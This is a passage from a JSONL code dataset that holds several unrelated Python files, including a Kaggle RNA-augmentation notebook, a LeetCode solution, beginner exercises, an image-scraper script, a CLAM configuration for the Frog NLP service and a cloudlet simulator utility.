f\"/kaggle/working/arnie.conf\"\nsys.path.append('/kaggle/working/draw_rna_pkg/')\nsys.path.append('/kaggle/working/draw_rna_pkg/ipynb/')\npkg = 'vienna_2'\n\n\n\n\n\nimport numpy as np\nimport pandas as pd\nfrom multiprocessing import Pool\nfrom arnie.pfunc import pfunc\nfrom arnie.mea.mea import MEA\nfrom arnie.free_energy import free_energy\nfrom arnie.bpps import bpps\nfrom arnie.mfe import mfe\nimport arnie.utils as utils\nfrom tqdm.notebook import tqdm as tqdm\n\nn_candidates = 2\n# turn off for all data\ndebug = True\n\n\n\n\nget_ipython().system('grep processor /proc/cpuinfo | wc -l')\n\n\n\n\nMAX_THRE = 4\n\n\n\n\ntrain = pd.read_json('../input/stanford-covid-vaccine/train.json', lines=True)\ntest = pd.read_json('../input/stanford-covid-vaccine/test.json', lines=True)\nif debug:\n train = train[:20]\n test = test[:20]\ntarget_df = train.append(test)\n\n\n\n\ndef proc1(arg):\n sequence = arg[0]\n id = arg[1]\n log_gamma = arg[2]\n bp_matrix = bpps(sequence, package=pkg)\n mea_mdl = MEA(bp_matrix,gamma=10**log_gamma)\n return id, sequence, mea_mdl.structure, log_gamma, mea_mdl.score_expected()[2]\n\nli = []\nfor log_gamma in range(10):\n for i, arr in enumerate(target_df[['sequence','id']].values):\n li.append([arr[0], arr[1], log_gamma])\n\np = Pool(processes=MAX_THRE)\nresults = []\nfor ret in tqdm(p.imap(proc1, li),total=len(li)):\n results.append(ret)\n #print(f'done for {ret[0]}')\ndf = pd.DataFrame(results, columns=['id', 'sequence', 'structure', 'log_gamma', 'score'])\n\ndf_tmp = target_df[['id', 'sequence', 'structure']].copy()\ndf_tmp['log_gamma'] = 100\ndf_tmp['score'] = 100\ndf = df.append(df_tmp).sort_values('score', ascending=False).reset_index(drop=True)\n\nnew_df = pd.DataFrame()\nfor id in df['id'].unique():\n unq_df = df[df['id'] == id].drop_duplicates('structure')\n unq_df['cnt'] = unq_df.shape[0]\n new_df = new_df.append(unq_df[1:min(n_candidates,len(unq_df))])\n\n\n\n\nget_ipython().system('mkdir -p tmp_files')\ndef get_predicted_loop_type(id, sequence, structure, debug=False):\n structure_fixed = structure.replace('.','0').replace('(','1').replace(')','2')\n pid = os.getpid()\n tmp_in_file = f'tmp_files/{id}_{structure_fixed}_{pid}.dbn'\n tmp_out_file = f'{id}_{structure_fixed}_{pid}.st'\n get_ipython().system('echo $sequence > $tmp_in_file')\n get_ipython().system('echo \"$structure\" >> $tmp_in_file')\n get_ipython().system('export PERL5LIB=/root/perl5/lib/perl5 && perl bpRNA/bpRNA.pl $tmp_in_file')\n result = [l.strip('\\n') for l in open(tmp_out_file)]\n if debug:\n print(sequence)\n print(structure)\n print(result[5])\n else:\n get_ipython().system('rm $tmp_out_file $tmp_in_file')\n return id, structure, result[5]\n\ndef proc2(arg):\n result = get_predicted_loop_type(arg[0], arg[1], arg[2], debug=False)\n return result\n\nli = []\nfor i, arr in enumerate(new_df[['id', 'sequence', 'structure']].values):\n li.append(arr)\n\np = Pool(processes=MAX_THRE)\nresults_loop_type = []\nfor ret in tqdm(p.imap(proc2, li),total=len(li)):\n results_loop_type.append(ret)\n #print(f'done for {ret[0]}')\n\nnew_df = new_df.merge(pd.DataFrame(results_loop_type, columns=('id', 'structure', 'predicted_loop_type')), on=['id','structure'], how='left')\nnew_df.to_csv('aug_data.csv', index=False)\n\n\n\n\nnew_df.head()\n\n\n\n\n\n\n","repo_name":"aorursy/lost-nb","sub_path":"its7171_how-to-generate-augmentation-data.py","file_name":"its7171_how-to-generate-augmentation-data.py","file_ext":"py","file_size_in_byte":4182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"6242258387","text":"class Solution:\n def validateStackSequences(self, pushed: List[int], popped: List[int]) -> bool:\n lenPushPop, posPush, posPop = len(pushed), 0, 0\n lst = []\n while(posPush < lenPushPop):\n if(not lst or lst[-1] != popped[posPop]):\n lst.append(pushed[posPush])\n posPush += 1\n else:\n lst.pop()\n posPop += 1\n return(True if lst[::-1] == popped[posPop:] else False)","repo_name":"saudbadar/LeetCode-Answers","sub_path":"946. Validate Stack Sequences/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"6735130941","text":"name = 'Cheshta'\r\nage = 15\r\nprint (name,age)\r\nlist1=[1,2,3,'abc','45']\r\nprint (list1)\r\n\"\"\" poketMoney=int(input('enter your poket Money'))\r\nprint (poketMoney)\r\nif(poketMoney <500):\r\n print ('you are poor')\r\nelse:\r\n print ('you are quit rich') \"\"\"\r\n\"\"\" age = int(input('enter your Age'))\r\nif(age <=12):\r\n print ('You are still a kid')\r\nelif (age>12 and age<=18):\r\n print ('You are a teenager')\r\nelse:\r\n print(\"you can Vote\") \"\"\"\r\n\r\nfor item in list1:\r\n print (item)\r\ncount = 5\r\nwhile count >=0:\r\n print(count)\r\n count-=1 ","repo_name":"cheshta-kabra/C-97","sub_path":"Texting.py","file_name":"Texting.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"6251151612","text":"donors = [('Donor A', [50, 100, 25, 100]),\n ('Donor B', [100, 25]),\n ('Donor C', [300])\n ]\n\ndef totaldonations(donations):\n return donations[1]\n\ndef report():\n report = []\n for (donor, amounts) in donors:\n report.append((donor, sum(amounts), len(amounts), sum(amounts)/len(amounts)))\n report.sort(key = totaldonations, reverse = True)\n print('Donor Name',' '*10, '| Total Given |', ' Num Gifts ', '| Average Gift |')\n print('-'*70)\n for (donor, total, num, avg) in report:\n print(donor, ' '*(21 - len(str(donor))), #print donor\n '$', ' '*(12 - len(str(total))), total, #print sum\n ' '*(12 - len(str(num))), num, #print num\n ' $', ' '*(12 - len(str(avg))), avg, #print avg\n )\n","repo_name":"UWPCE-PythonCert-ClassRepos/Sp2018-Accelerated","sub_path":"students/Osiddiquee/lesson03/mailroom_report.py","file_name":"mailroom_report.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"2974032214","text":"import random\n\n# function prompting player to choose between rock paper or scissors\ndef player_rps():\n while True: \n print(\"Do you choose rock, paper, or scissors?\")\n player_choice = input()\n player_choice = player_choice.lower()\n if player_choice != \"rock\" and player_choice != \"paper\" and player_choice != \"scissors\":\n print(\"Please choose between: rock, paper, scissors\") \n else:\n return player_choice \n\n# function randomly selecting a choice for the computer\ndef computer_rps():\n options = [\"rock\", \"paper\", \"scissors\"]\n computer_choice = options[random.randint(0, 2)]\n return computer_choice\n \n# output: prints the winner of the game\ndef rps(player, computer):\n if player == computer:\n print(\"It's a tie!\")\n elif player == \"rock\":\n if computer == \"scissors\":\n print(\"You won! Congrats!\")\n else:\n print(\"The computer won :(\")\n elif player == \"paper\":\n if computer == \"rock\":\n print(\"You won! Congrats!\")\n else:\n print(\"The computer won :(\")\n elif player == \"scissors\":\n if computer == \"paper\":\n print(\"You won! Congrats!\")\n else:\n print(\"The computer won :(\")\n\nplay = \"yes\"\nwhile play == \"yes\":\n # game greeting\n print(\"Welcome to Rock, Paper, Scissors!\")\n\n # ask player to input their rps choice\n player = player_rps()\n \n # computer randomly chooses\n computer = computer_rps()\n print(\"-----\")\n\n # print the results of the game\n print(\"You chose: \" + player.upper())\n print(\"The computer chose: \" + computer.upper())\n print(\"-----\")\n rps(player, computer)\n\n # ask user if they'd like to play again\n play = input(\"Would you like to play again? (yes or no)\")\n print(\"-----\")\n\nprint(\"Thank you for playing!\")\n \n","repo_name":"alexandroid01/rock-paper-scissors","sub_path":"rps.py","file_name":"rps.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"12497344976","text":"\nfrom concurrent.futures import ThreadPoolExecutor, wait , ALL_COMPLETED\nfrom functools import partial\nimport splat\nimport wisps\nfrom wisps import make_spt_number\nimport pandas as pd\nimport numpy as np\n\ndef add_noise_to_spectrum(sp, snr):\n #if I propose a larger SNR don't do anything to save time\n sp.reset()\n sp_old=sp.spectral_type\n sp.add_noise(snr, nsample=1, recompute_indices= True)\n f_test={\"f_test\": sp.f_test, 'line_chi': sp.line_chi, 'name': sp.name, 'spex_chi': sp.spex_chi, \\\n 'spt_new': sp.spectral_type, 'sp_old': sp_old, 'dof': sp.dof}\n res_dict= {**sp.snr, **sp.indices, **f_test}\n sp.reset()\n return res_dict\n \ndef add_multiple_noises(sp, noises):\n res=list(map(lambda x: add_noise_to_spectrum(sp, x), noises))\n return res\n\ndef add_noise_to_spectra(nsample=10, filein=wisps.LIBRARIES+'/ydwarfs.pkl', fileout=wisps.LIBRARIES+'/ydwarfs_plus_noise.pkl') :\n spectra=pd.read_pickle(filein)\n snrs=10**np.random.uniform(-1,3,(len(spectra), nsample))\n iterables=([spectra, snrs])\n\n method=partial(add_multiple_noises)\n with ThreadPoolExecutor(max_workers=100) as executor:\n futures=list(executor.map( method, *iterables, timeout=None, chunksize=10))\n\n results=[x for x in futures]\n\n df=pd.DataFrame.from_records(results)\n df.to_pickle(fileout, protocol=2)\n\nif __name__ =='__main__':\n #add_noise_to_spectra(nsample=500)\n add_noise_to_spectra(nsample=500, filein=wisps.LIBRARIES+'/subdwarfs.pkl', fileout=wisps.LIBRARIES+'/subdwarfs_plus_noise.pkl')","repo_name":"caganze/wisps","sub_path":"wisps/simulations/addnoisetotemplates.py","file_name":"addnoisetotemplates.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"33550455042","text":"import requests as req\nfrom bs4 import BeautifulSoup as bs\nimport argparse\nimport threading\nimport atexit\n#handle 429 exception (too many requests)\n\nalready_visited=set()\nalready_downloaded=set()\n\ndef exit_print():\n\tprint(f\"Pages visited: {len(already_visited)}\")\n\tprint(f\"Images downloaded: {len(already_downloaded)}\")\n\ndef parse():\n\tparser = argparse.ArgumentParser(\n\t\tprog = 'python3 spider.py', \n\t\tdescription = 'scrape images from URL'\n\t)\n\tparser.add_argument('URL', help='URL to scrape')\n\tparser.add_argument('-r', action='store_true', help='recursive scraping, recommended use with -l', default = False)\n\tparser.add_argument('-l', help ='specify how many levels of recursive search (default is 1), if used without -r its ignored', default = 0)\n\tparser.add_argument('-p', help='specify path where images are saved (default is ./data)', default='./data')\n\tparser.add_argument('-o', action='store_false', help='go thorugh the web, but not out of it , for this option its important to start the url with \"https://www\"', default = True)\n\targs = parser.parse_args()\n\treturn args.__dict__\n\ndef url_converter(base_url, url):\n\tif (url.startswith(\"//\")):\n\t\turl = \"https:\" + url\n\telif (url.startswith(\"/\")):\n\t\turl = base_url + url\n\treturn url\n\n#handle xlink:href\ndef recursive_main(url, depth):\n\talready_visited.add(url)\n\tprint(url)\n\tprint(f\"Depth: {depth}\")\n\ttry:\n\t\tresponse = req.get(url, timeout = 2)\n\t\tprint(f\"Response: {response.status_code}\")\n\t\tprint()\n\texcept Exception:\n\t\tprint(\"Couldnt open url\")\n\t\tprint()\n\t\treturn\n\tif (response.status_code != 200):\n\t\treturn\n\ttry:\n\t\tsoup = bs(response.content, \"lxml\")\n\texcept:\n\t\treturn\n\tthreading.Thread(target=download_images(url, soup))\n\tif (depth >= level):\n\t\treturn\n\tlinks_html = soup.find_all('a')\n\tfor link_html in links_html:\n\t\ttry:\n\t\t\treal_url = link_html['href']\n\t\texcept Exception:\n\t\t\tpass\n\t\telse:\n\t\t\treal_url = url_converter(url, real_url)\n\t\t\tif (real_url.startswith(cant_exit_url) and not already_visited.__contains__(real_url)):\n\t\t\t\trecursive_main(real_url, depth + 1)\n\ndef valid_image(url):\n\treturn url.endswith(\".jpg\") or url.endswith(\".jpeg\") or url.endswith(\".png\") or url.endswith(\".gif\") or url.endswith(\".bpm\") \n\n#handle image icons tags\ndef download_images(url, beautiful):\n\timages_html = beautiful.find_all('img')\n\tfor image_html in images_html:\n\t\ttry:\n\t\t\tsrc = image_html['src']\n\t\texcept:\n\t\t\tpass\n\t\telse:\n\t\t\tsrc = url_converter(url, src)\n\t\t\tif (not already_downloaded.__contains__(src)):\n\t\t\t\talready_downloaded.add(src)\n\t\t\t\tif (valid_image(src)):\n\t\t\t\t\ttry:\n\t\t\t\t\t\timage = req.get(src, timeout=2)\n\t\t\t\t\texcept Exception:\n\t\t\t\t\t\tpass\n\t\t\t\t\telse:\n\t\t\t\t\t\tif (image.status_code == 200):\n\t\t\t\t\t\t\tif len(src) > 255:\n\t\t\t\t\t\t\t\tsrc = src[-255:-1] + src[-1]\n\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\twith open(path + '/' + src.replace('/','|'), \"wb\") as file:\n\t\t\t\t\t\t\t\t\tfile.write(image.content)\n\t\t\t\t\t\t\texcept MemoryError:\n\t\t\t\t\t\t\t\tprint(\"You ran out of memory!\")\n\t\t\t\t\t\t\t\texit()\n\t\t\t\t\t\t\texcept Exception:\n\t\t\t\t\t\t\t\tprint(\"Couldnt download image from \" + src + \" check if folder in which images will be downloaded (./data by default) exists\")\n\nif __name__ == \"__main__\":\n\tatexit.register(exit_print)\n\tdict = parse()\n\tglobal level, path, cant_exit_url\n\tcant_exit_url = \"\"\n\turl = dict.get('URL')\n\trecursive = dict.get('r')\n\tlevel = int(dict.get('l'))\n\tif not recursive:\n\t\tlevel = 0 \n\tif recursive and level == 0:\n\t\tlevel = 1 \n\tpath = dict.get('p')\n\tout = dict.get('o')\n\tif not out:\n\t\tsplitted = url.split('/')\n\t\tcant_exit_url = splitted[0] + \"//\" + splitted[2]\n\trecursive_main(url, 0)\n","repo_name":"migueldar/42CyberSec_arachnida","sub_path":"spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":3502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"32499509779","text":"#!/usr/bin/env python3\n#-*- coding:utf-8 -*-\n\n\n###############################################################\n# CLAM: Computational Linguistics Application Mediator\n# -- Settings --\n# by Maarten van Gompel (proycon)\n# http://proycon.github.io/clam/\n# Centre for Language and Speech Technology / Language Machines\n# Radboud University Nijmegen\n#\n# Licensed under GPLv3\n#\n###############################################################\n\n\nfrom __future__ import print_function, unicode_literals, division, absolute_import\n\nfrom clam.common.parameters import *\nfrom clam.common.formats import *\nfrom clam.common.viewers import *\nfrom clam.common.data import *\nfrom clam.common.converters import *\nfrom clam.common.digestauth import pwhash\nimport clamservices.wrappers\nimport os\nfrom base64 import b64decode as D\n\nREQUIRE_VERSION = 2.0\nWRAPPERDIR = clamservices.wrappers.__path__[0]\n\n#THIS CONFIGURATION IS FOR FROG >= 0.12.10 ! OLDER VERSIONS WON'T WORK WITH IT!\n\n#============== General meta configuration =================\nSYSTEM_ID = \"frog\"\nSYSTEM_NAME = \"Frog\"\nSYSTEM_DESCRIPTION = \"Frog is a suite containing a tokeniser, Part-of-Speech tagger, lemmatiser, morphological analyser, shallow parser, and dependency parser for Dutch, developed at Tilburg University. It is the successor of Tadpole.\"\n\n\nUSERS = None\n\n# ================ Server specific configuration for CLAM ===============\nhost = os.uname()[1]\nif 'VIRTUAL_ENV' in os.environ and os.path.exists(os.environ['VIRTUAL_ENV'] +'/bin/frog'):\n # Virtual Environment (LaMachine)\n ROOT = os.environ['VIRTUAL_ENV'] + \"/frog.clam/\"\n PORT = 8801\n BINDIR = os.environ['VIRTUAL_ENV'] + '/bin/'\n FLATURL = \"http://127.0.0.1:8000\" #local LaMachine FLAT\n\n if host == 'applejack': #configuration for server in Nijmegen\n HOST = \"webservices-lst.science.ru.nl\"\n URLPREFIX = 'frog'\n\n if not 'CLAMTEST' in os.environ:\n ROOT = \"/scratch2/www/webservices-lst/live/writable/frog/\"\n if 'CLAMSSL' in os.environ:\n PORT = 443\n else:\n PORT = 80\n else:\n ROOT = \"/scratch2/www/webservices-lst/test/writable/frog/\"\n PORT = 81\n\n USERS_MYSQL = {\n 'host': 'mysql-clamopener.science.ru.nl',\n 'user': 'clamopener',\n 'password': D(open(os.environ['CLAMOPENER_KEYFILE']).read().strip()),\n 'database': 'clamopener',\n 'table': 'clamusers_clamusers'\n }\n DEBUG = False\n REALM = \"WEBSERVICES-LST\"\n DIGESTOPAQUE = open(os.environ['CLAM_DIGESTOPAQUEFILE']).read().strip()\n SECRET_KEY = open(os.environ['CLAM_SECRETKEYFILE']).read().strip()\n ADMINS = ['proycon','antalb','wstoop']\n FLATURL = \"https://flat.science.ru.nl\"\n elif host == 'mlp01': #new server (Nijmegen)\n HOST = \"webservices-lst.science.ru.nl\"\n URLPREFIX = 'frog'\n\n if not 'CLAMTEST' in os.environ:\n ROOT = \"/var/www/webservices-lst/live/writable/frog/\"\n if 'CLAMSSL' in os.environ:\n PORT = 443\n else:\n PORT = 80\n else:\n ROOT = \"/var/www/webservices-lst/test/writable/frog/\"\n PORT = 81\n\n USERS_MYSQL = {\n 'host': 'mysql-clamopener.science.ru.nl',\n 'user': 'clamopener',\n 'password': D(open(os.environ['CLAMOPENER_KEYFILE']).read().strip()),\n 'database': 'clamopener',\n 'table': 'clamusers_clamusers'\n }\n DEBUG = False\n REALM = \"WEBSERVICES-LST\"\n DIGESTOPAQUE = open(os.environ['CLAM_DIGESTOPAQUEFILE']).read().strip()\n SECRET_KEY = open(os.environ['CLAM_SECRETKEYFILE']).read().strip()\n ADMINS = ['proycon','antalb','wstoop']\n FLATURL = \"https://flat.science.ru.nl\"\nelif os.path.exists('/usr/bin/frog') and os.path.exists(\"/home/vagrant\") and os.getuid() == 998:\n # Virtual Machine (LaMachine)\n ROOT = \"/home/vagrant/frog.clam/\"\n PORT = 8801\n BINDIR = '/usr/bin/'\n FLATURL = \"http://127.0.0.1:8000\" #local LaMachine FLAT\nelif os.path.exists('/usr/bin/frog') and os.getuid() == 0 and os.path.exists('/etc/arch-release'):\n # Docker (LaMachine)\n ROOT = \"/clamdata/frog.clam/\"\n PORT = 8801\n BINDIR = '/usr/bin/'\n FLATURL = \"http://127.0.0.1:8000\" #local LaMachine FLAT\nelif host == \"hostnameofyoursystem\":\n #**** adapt hostname and add custom configuration for your system here ****\n raise NotImplementedError\nelse:\n raise Exception(\"I don't know where I'm running from! Got \" + host)\n\n\n\n\n#The system command (Use the variables $STATUSFILE $DATAFILE $PARAMETERS $INPUTDIRECTORY $OUTPUTDIRECTORY $USERNAME)\nCOMMAND = WRAPPERDIR + \"/frogwrapper.py \" + BINDIR + \" $DATAFILE $STATUSFILE $OUTPUTDIRECTORY > $OUTPUTDIRECTORY/log\"\n\n\nPROFILES = [\n Profile(\n InputTemplate('maininput', PlainTextFormat,\"Text document\",\n StaticParameter(id='encoding',name='Encoding',description='The character encoding of the file', value='utf-8'),\n StringParameter(id='author', name='Author', description='The author of the document (optional)'),\n StringParameter(id='docid', name='Document ID', description='An ID for the document (optional, used with FoLiA XML output)'),\n BooleanParameter(id='sentenceperline', name='One sentence per line?', description='If set, assume that this input file contains exactly one sentence per line'),\n PDFtoTextConverter(id='pdfconv',label='Convert from PDF Document'),\n MSWordConverter(id='mswordconv',label='Convert from MS Word Document'),\n CharEncodingConverter(id='latin1',label='Convert from Latin-1 (iso-8859-1)',charset='iso-8859-1'),\n CharEncodingConverter(id='latin9',label='Convert from Latin-9 (iso-8859-15)',charset='iso-8859-15'),\n multi=True,\n extension='.txt',\n ),\n OutputTemplate('mainoutput', TadpoleFormat,\"Frog Columned Output (legacy)\", #named 'mainoutput' for legacy reasons\n SetMetaField('tokenisation','yes'),\n SetMetaField('postagging','yes'),\n SetMetaField('lemmatisation','yes'),\n SetMetaField('morphologicalanalysis','yes'),\n ParameterCondition(skip_contains='m',\n then=SetMetaField('mwudetection','no'),\n otherwise=SetMetaField('mwudetection','yes'),\n ),\n ParameterCondition(skip_contains='p',\n then=SetMetaField('parsing','no'),\n otherwise=SetMetaField('parsing','yes'),\n ),\n removeextensions=['.txt','.xml'],\n extension='.frog.out',\n copymetadata=True,\n multi=True,\n ),\n OutputTemplate('foliaoutput', FoLiAXMLFormat,\"FoLiA Document\",\n FoLiAViewer(),\n FLATViewer(url=FLATURL, mode='viewer'),\n removeextensions=['.txt'],\n extension='.xml',\n copymetadata=True,\n multi=True,\n ),\n ),\n Profile(\n InputTemplate('foliainput', FoLiAXMLFormat,\"FoLiA XML document\",\n extension='.xml',\n multi=True,\n ),\n OutputTemplate('mainoutput', TadpoleFormat,\"Frog Columned Output (legacy)\", #named 'mainoutput' for legacy reasons\n SetMetaField('tokenisation','yes'),\n SetMetaField('postagging','yes'),\n SetMetaField('lemmatisation','yes'),\n SetMetaField('morphologicalanalysis','yes'),\n ParameterCondition(skip_contains='m',\n then=SetMetaField('mwudetection','no'),\n otherwise=SetMetaField('mwudetection','yes'),\n ),\n ParameterCondition(skip_contains='p',\n then=SetMetaField('parsing','no'),\n otherwise=SetMetaField('parsing','yes'),\n ),\n removeextensions=['.xml','.txt'],\n extension='.frog.out',\n copymetadata=True,\n multi=True,\n ),\n OutputTemplate('foliaoutput', FoLiAXMLFormat,\"FoLiA Document\",\n FoLiAViewer(),\n FLATViewer(url=FLATURL, mode='viewer'),\n extension='.xml',\n copymetadata=True,\n multi=True,\n ),\n ),\n\n]\n\nPARAMETERS = [\n\n ('Modules', [\n ChoiceParameter('skip', 'Skip modules','Are there any components you want to skip? Skipping components you do not need may speed up the process considerably.',paramflag='--skip=',choices=[('t','Tokeniser'),('m','Multi-Word Detector'),('p','Parser'),('c','Chunker / Shallow parser'),('n','Named Entity Recognition')], multi=True ),\n #ChoiceParameter('skip', 'Skip Components','Are there any components you want to skip? Skipping the parser speeds up the process considerably.',paramflag='--skip=',choices=[('p','Skip dependency parser'),('n',\"Don't skip anything\")] ),\n ]),\n]\n","repo_name":"AymanYac/Neonec-Deep-Classsifier","sub_path":"install/lamachine/lib/python3.5/site-packages/CLAMServices-1.4.4-py3.5.egg/clamservices/config/frog.py","file_name":"frog.py","file_ext":"py","file_size_in_byte":8914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"73109347255","text":"# coding:utf-8\n\"\"\"\noldutility.py\nAuthor : Kouhei Osaki\nCreated : 2017/06/14\nLast-Modified : 2017/07/07\nVersion : 1.4.0\nDescription : 有用な関数などを定義している(適当\n\"\"\"\n\n\nimport math\nfrom typing import Dict, List\nfrom simulator.oldmodels import AllTimeCloudlets, Devices, AllocationPlan, Cloudlet, Cloudlets, Point\n\n\ndef is_udrl(x, y, base_x, base_y):\n \"\"\"\n x, y座標がbase_x, base_yの上下左右いずれかの座標であるかをチェックする\n :param x: 調査対象のx座標\n :param y: 調査対象のx座標\n :param base_x: 基準となるx座標\n :param base_y: 基準となるy座標\n :return: 上下左右のいずれかであればTrue, そうでなければFalse\n \"\"\"\n if base_x == x and math.fabs(base_y - y) == 1:\n return True\n if math.fabs(base_x - x) == 1 and base_y == y:\n return True\n return False\n\n\ndef range2d(start, stop):\n \"\"\"\n rangeから2変数をまとめて取得\n :param start: \n :param stop: \n :return: \n \"\"\"\n n1 = range(start, stop)\n n2 = range(start, stop)\n return n1, n2\n\n\ndef create_input_data(file_save: bool=False, output_file: str=\"input_data.json\") -> Devices:\n \"\"\"\n 入力データを生成し、file_saveがTrueならファイルにjson形式で書き込む\n :param file_save: \n :param output_file: 出力先ファイル\n :return: 入力データ\n \"\"\"\n import json\n from simulator.olddataset import create_devices\n devices = create_devices()\n if file_save is True:\n input_data = {\"devices\": devices}\n f = open(output_file, \"w\")\n json.dump(input_data, f)\n f.close()\n return devices\n\n\ndef load_input_data(input_file: str=\"input_data.json\") -> Devices:\n \"\"\"\n 指定されたファイルから入力データを読み込む\n :param input_file: 入力データが保存されたファイル\n :return: 入力データ\n \"\"\"\n import json\n f = open(input_file, \"r\")\n input_data = json.load(f)\n return input_data[\"devices\"]\n\n\ndef create_all_time_cloudlets(t_len: int, x_len: int, y_len: int, max_resource: int=5) -> AllTimeCloudlets:\n \"\"\"\n 時間軸、横軸、縦軸の最大長を指定してCloudletの三次元リストを生成する。\n :param t_len: 時間軸の最大長\n :param x_len: 横軸の最大長\n :param y_len: 縦軸の最大長\n :param max_resource: \n :return: \n \"\"\"\n all_time_cloudlets = [[[Cloudlet(r=max_resource) for i in range(x_len)]\n for j in range(y_len)]\n for k in range(t_len)] # type: AllTimeCloudlets\n return all_time_cloudlets\n\n\ndef create_blank_allocation_plan(all_time_cloudlets: AllTimeCloudlets, devices: Devices) -> AllocationPlan:\n \"\"\"\n 空の割当計画表を生成するメソッド\n :param all_time_cloudlets: Cloudletの3次元リスト\n :param devices: Deviceのリスト\n :return: \n \"\"\"\n allocation_plan = {} # type: AllocationPlan\n for device in devices:\n allocation_plan[device.name] = [None for i in range(len(all_time_cloudlets))]\n return allocation_plan\n\n\ndef is_valid_cell(cloudlets: Cloudlets, x: int, y: int) -> bool:\n if not (0 <= y < len(cloudlets)):\n return False\n if not (0 <= x < len(cloudlets[y])):\n return False\n return True\n\n\ndef is_valid_all_time_cell(all_time_cloudlets: AllTimeCloudlets, t: int, x: int, y: int) -> bool:\n \"\"\"\n 指定され���CellがCloudlets中で有効か判定する\n :param all_time_cloudlets: Cloudletの三次元リスト([time][y][x])\n :param t: 時間\n :param x: x軸\n :param y: y軸\n :return: 有効ならTrue,無効ならFalse\n \"\"\"\n if not (0 <= t < len(all_time_cloudlets)):\n return False\n return is_valid_cell(all_time_cloudlets[t], x, y)\n\n\ndef get_udrl_cloudlet(cloudlets: Cloudlets, x: int, y: int) -> List[Cloudlet]:\n pts = [Point(xx, yy) for xx in [x-1, x, x+1] for yy in [y-1, y, y+1] if is_udrl(xx, yy, x, y)]\n return [cloudlets[p.y][p.x] for p in pts if is_valid_cell(cloudlets, p.x, p.y)]\n\n\ndef get_near_cloudlet(cloudlets: Cloudlets, x: int, y: int,\n distance: int, invalid_distance: int=0) -> List[Cloudlet]:\n # 既出\n spc = []\n # 近接\n near = []\n spc.append(cloudlets[y][x])\n targets = [cloudlets[y][x]]\n if invalid_distance < 0:\n near.append(cloudlets[y][x])\n for now in range(1, distance + 1):\n new = []\n for t in targets:\n p = get_cloudlet_point_from_cloudlets(t.name, cloudlets)\n udrl = get_udrl_cloudlet(cloudlets, p.x, p.y)\n for c in udrl:\n if c in spc:\n pass\n else:\n new.append(c)\n spc.append(c)\n if now > invalid_distance:\n near.append(c)\n targets = new\n return near\n\n\ndef get_cloudlet_point_from_cloudlets(name: str, cloudlets: Cloudlets) -> Point:\n for y, row in enumerate(cloudlets):\n for x, c in enumerate(row):\n if c.name == name:\n return Point(x, y)\n else:\n return None\n\n\ndef continuity(target: List[Point]) -> bool:\n \"\"\"\n targetが持つ経路が上下左右いずれかで連続しているかを調べる\n :param target: 検査経路\n :return: 連続している場合True,していない場合False\n \"\"\"\n prev = None # type:Point\n for point in target:\n if prev is None:\n # 最初の一個目の場合\n prev = point\n continue\n if is_udrl(point.x, point.y, prev.x, prev.y):\n prev = point\n else:\n return False\n return True\n\n\ndef dist(p1: Point, p2: Point) -> int:\n \"\"\"\n 2点間の距離を返す\n :param p1: \n :param p2: \n :return: 距離\n \"\"\"\n return int(math.fabs(p2.x - p1.x)) + int(math.fabs(p2.y - p1.y))\n\n\ndef scope(center: Point, distance_max: int,\n x_max: int, y_max: int, distance_min: int=0, x_min: int=0, y_min: int=0) -> List[Point]:\n ret = [] # type:List[Point]\n for y in range(y_min, y_max + 1):\n for x in range(x_min, x_max + 1):\n point = Point(x, y)\n if distance_min <= dist(center, point) <= distance_max:\n ret.append(point)\n return ret\n\n\n","repo_name":"kiko1995428/mecsimulator","sub_path":"CloudletSimulator/simulator/oldutility.py","file_name":"oldutility.py","file_ext":"py","file_size_in_byte":6387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"28019858168","text":"\"\"\"Example code for the paper summary script\"\"\"\nfrom src.paper_summary import (\n download_paper,\n get_paper_summary,\n load_openai_api_key,\n save_text_to_file,\n)\n\n\ndef main():\n \"\"\"Main function\"\"\"\n\n paper_url = \"shorturl.at/yBHTV\"\n paper_out = \"./download/zhuo.pdf\"\n summary_out = \"./output/zhuo_summary.txt\"\n text_out: Optional[str] = \".output/summary/text_out\"\n\n # Load the OpenAI API key\n load_openai_api_key()\n\n # Download the paper\n if paper_url is not None:\n download_paper(paper_url, paper_out)\n\n # Get the summary of the paper\n paper_text, paper_summary = get_paper_summary(paper_out)\n\n # Save the summary of the paper\n save_text_to_file(paper_summary, summary_out)\n\n # Save the paper text\n if text_out is not None:\n save_text_to_file(paper_text, text_out)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"HinnyTsang/paper-summary","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"44681728922","text":"# variables\nnama = 'Rudy Aunallah Bumi Satrio' # menghitung jumlah spasi dengan split\ntotal = len(nama)\njumlah_spasi = len(nama.split(' ')) - 1\ntotal_tanpa_spasi = total - jumlah_spasi\n\nprint('Nama', nama, 'mengandung: ', total_tanpa_spasi, 'huruf')\n\n# mencari karakter tertentu dengan replace\nnama = 'Rudy Aunallah Bumi Satrio'\ncari_huruf = 'i'\nnama_tanpa_cari = nama.lower().replace(cari_huruf.lower(), '') \n# lower()/upper() digunakan agar dapat mencari huruf yg berbeda upper/lower case\njumlah_cari = len(nama) - 